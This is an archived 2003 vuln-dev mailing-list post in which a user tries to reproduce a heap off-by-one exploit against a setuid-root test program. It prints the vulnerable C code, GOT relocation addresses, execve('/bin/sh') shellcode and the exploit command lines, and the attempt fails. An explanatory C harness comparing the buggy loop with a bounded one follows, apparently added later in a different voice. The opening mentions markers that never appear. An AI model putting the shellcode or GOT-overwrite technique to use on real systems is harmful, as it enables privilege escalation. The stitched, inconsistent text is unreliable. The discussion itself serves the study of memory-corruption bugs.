There was an erroneous /xfg below, which I re-ran with /xff. It's marked with ****

-----Original Message-----
From: Jeremy Junginger
Sent: Wednesday, May 21, 2003 2:28 PM
To: 'Jon Erickson'; vuln-devat_private
Subject: RE: vulndev1.c solution (WARNING! QUESTIONS!)

This is by far the most informative BO discussion I have read. If there are any takers out there (Mr. Erickson?), I have some questions. I was trying to replicate Mr. Erickson's exploit on a Redhat 8.0 system, but am having some trouble understanding. I have tried my best to n00b along with Jon. Please take a look at this if you have time and let me know how to get my head out of my a$$ on this.

Thanks,

[root@OxFFFFFF bufferoverflow]# uname -a
Linux OxFFFFFF 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux

[root@OxFFFFFF bufferoverflow]# cat vulndev1.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* needed for strncpy; missing from the listing as posted */

#define SIZE 252

int main(int argc, char *argv[])
{
    int i;
    char *p1, *p2;
    char *buf1 = malloc(SIZE);
    char *buf2 = malloc(SIZE);

    if (argc != 3)
        exit(1);

    p1 = argv[1], p2 = argv[2];
    printf("p1 is at %p\n", p1);
    strncpy(buf2, p2, SIZE);
    /* off-by-one: "i <= SIZE" allows index SIZE, one byte past the end of buf1 */
    for (i = 0; i <= SIZE && p1[i] != '\0'; i++)
        buf1[i] = p1[i];
    free(buf1);
    free(buf2);
    return 0;
}

(No explanation needed)

[root@OxFFFFFF bufferoverflow]# gcc -o vuln1 vulndev1.c
[root@OxFFFFFF bufferoverflow]# sudo chown root.root ./vuln1
[root@OxFFFFFF bufferoverflow]# sudo chmod u+s ./vuln1

(Looking for address of free (08049638) and _libc_start_main (0804962c))

[root@OxFFFFFF bufferoverflow]# objdump -R ./vuln1

./vuln1:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
08049640 R_386_GLOB_DAT    __gmon_start__
08049628 R_386_JUMP_SLOT   malloc
0804962c R_386_JUMP_SLOT   __libc_start_main
08049630 R_386_JUMP_SLOT   printf
08049634 R_386_JUMP_SLOT   exit
08049638 R_386_JUMP_SLOT   free
0804963c R_386_JUMP_SLOT   strncpy

(Okay, I'm taking 0x38 (from free?!?) and subtracting 12...but I'm not sure what this does)

[root@OxFFFFFF bufferoverflow]# pcalc 0x38-12
        44              0x2c            0y101100

(Here I'm showing the shellcode. It's not the same as Jon's; this is one obvious point at which it may be failing. Perhaps I can get a copy of the 'shell' file or get a clue as to how to generate one...besides using shellcode.c from http://packetstormsecurity.nl)

[root@OxFFFFFF bufferoverflow]# od -ch shell
0000000   \   x   e   b   \   x   1   f   \   x   5   e   \   x   8   9
           785c    6265    785c    6631    785c    6535    785c    3938
0000020   \   x   7   6   \   x   0   8   \   x   3   1   \   x   c   0
           785c    3637    785c    3830    785c    3133    785c    3063
0000040   \   x   8   8   \   x   4   6   \   x   0   7   \   x   8   9
           785c    3838    785c    3634    785c    3730    785c    3938
0000060   \   x   4   6   \   x   0   c   \   x   b   0   \   x   0   b
           785c    3634    785c    6330    785c    3062    785c    6230
0000100   \   x   8   9   \   x   f   3   \   x   8   d   \   x   4   e
           785c    3938    785c    3366    785c    6438    785c    6534
0000120   \   x   0   8   \   x   8   d   \   x   5   6   \   x   0   c
           785c    3830    785c    6438    785c    3635    785c    6330
0000140   \   x   c   d   \   x   8   0   \   x   3   1   \   x   d   b
           785c    6463    785c    3038    785c    3133    785c    6264
0000160   \   x   8   9   \   x   d   8   \   x   4   0   \   x   c   d
           785c    3938    785c    3864    785c    3034    785c    6463
0000200   \   x   8   0   \   x   e   8   \   x   d   c   \   x   f   f
           785c    3038    785c    3865    785c    6364    785c    6666
0000220   \   x   f   f   \   x   f   f   /   b   i   n   /   s   h  \n
           785c    6666    785c    6666    622f    6e69    732f    0a68
0000240  \n  \0
           000a
0000241

(Take a byte count on the shell...looks kinda big compared to Jon's)

[root@OxFFFFFF bufferoverflow]# wc -c shell
161 shell

(Subtract the size of the shellcode from SIZE)

[root@OxFFFFFF bufferoverflow]# pcalc 252-161
        91              0x5b            0y1011011

(Okay, using the address 0804962c (_libc_start_main, represented as \x2c\x96\x04\x08), we run a long string of 91 A's (SIZE-SHELLCODE) and append the address)

[root@OxFFFFFF bufferoverflow]# ./vuln1 `perl -e 'print "A"x91;'``cat shell``printf "\x0b"` `printf "\x2c\x96\x04\x08ABCD"`
p1 is at 0xbffffb35

(There we get the location of p1, and append it to the end (bffffb35 represented as \x35\xff\xff\xbf))

[root@OxFFFFFF bufferoverflow]# ./vuln1 `perl -e 'print "A"x91;'``cat shell``printf "\x0b"` `printf "\x2c\x96\x04\x08\x35\xff\xff\xbf"`
p1 is at 0xbffffb30

(Whiskey, Tango, Foxtrot, Over?!?....p1 is different....and no shell?!? Back to the drawing board :(

[root@OxFFFFFF bufferoverflow]#
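The bug the whole thread turns on is the copy loop in vulndev1.c: "i <= SIZE" accepts index SIZE, so a long enough argv[1] writes one byte past the 252-byte buf1 into whatever malloc placed next to it. The following is an added example, not code from Jeremy's mail or from Jon Erickson's solution: it puts the off-by-one loop beside a bounded version and runs each into a region with a sentinel byte at index SIZE, so the out-of-bounds write shows up as a clobbered sentinel rather than as heap corruption. SIZE and the loop shape are taken from vulndev1.c; the harness, the function names and the 'A'-filled input are my own constructions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SIZE 252  /* same buffer size as vulndev1.c */

typedef size_t (*copy_fn)(char *dst, const char *src);

/* The loop as written in vulndev1.c: "i <= SIZE" accepts index SIZE, so a
 * source with SIZE+1 or more non-NUL bytes stores one byte past a SIZE-byte
 * buffer. Returns the number of bytes written (reaches SIZE+1 on long input). */
size_t copy_off_by_one(char *dst, const char *src)
{
    size_t i;
    for (i = 0; i <= SIZE && src[i] != '\0'; i++)
        dst[i] = src[i];
    return i;
}

/* Corrected loop: "i < SIZE" keeps every store inside dst[0..SIZE-1].
 * Returns the number of bytes written (never more than SIZE). */
size_t copy_bounded(char *dst, const char *src)
{
    size_t i;
    for (i = 0; i < SIZE && src[i] != '\0'; i++)
        dst[i] = src[i];
    return i;
}

/* Sentinel harness (my own, hypothetical helper): allocate SIZE bytes plus one
 * spare byte, store a known value in the spare byte, run the copy with a source
 * longer than SIZE, and report whether the spare byte changed. In vulndev1.c
 * that byte is not spare at all; it belongs to the neighbouring heap chunk,
 * which is why the mail above ends up looking at the address of free(). */
int sentinel_clobbered(copy_fn fn)
{
    const unsigned char sentinel = 0x5A;
    char *region = malloc(SIZE + 1);
    char *src = malloc(SIZE + 2);
    int clobbered;

    if (!region || !src) {
        free(region);
        free(src);
        return -1;
    }

    /* constructed input: SIZE+1 'A's, one more than the buffer can hold */
    memset(src, 'A', SIZE + 1);
    src[SIZE + 1] = '\0';
    region[SIZE] = (char)sentinel;

    fn(region, src);

    clobbered = (unsigned char)region[SIZE] != sentinel;
    free(region);
    free(src);
    return clobbered;
}

int main(void)
{
    printf("off-by-one loop clobbers sentinel: %d\n",
           sentinel_clobbered(copy_off_by_one));
    printf("bounded loop clobbers sentinel:    %d\n",
           sentinel_clobbered(copy_bounded));
    return 0;
}
```

Run as is, the program reports 1 for the original loop and 0 for the bounded one. The same sentinel idea is what heap debuggers and compiler sanitizers do at scale; building the binary with a bounds checker instead of relying on a printf of p1 would have shown Jeremy immediately that the first write past buf1 lands on the next chunk rather than anywhere near the GOT.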
This archive was generated by hypermail 2b30 : Wed May 21 2003 - 15:05:38 PDT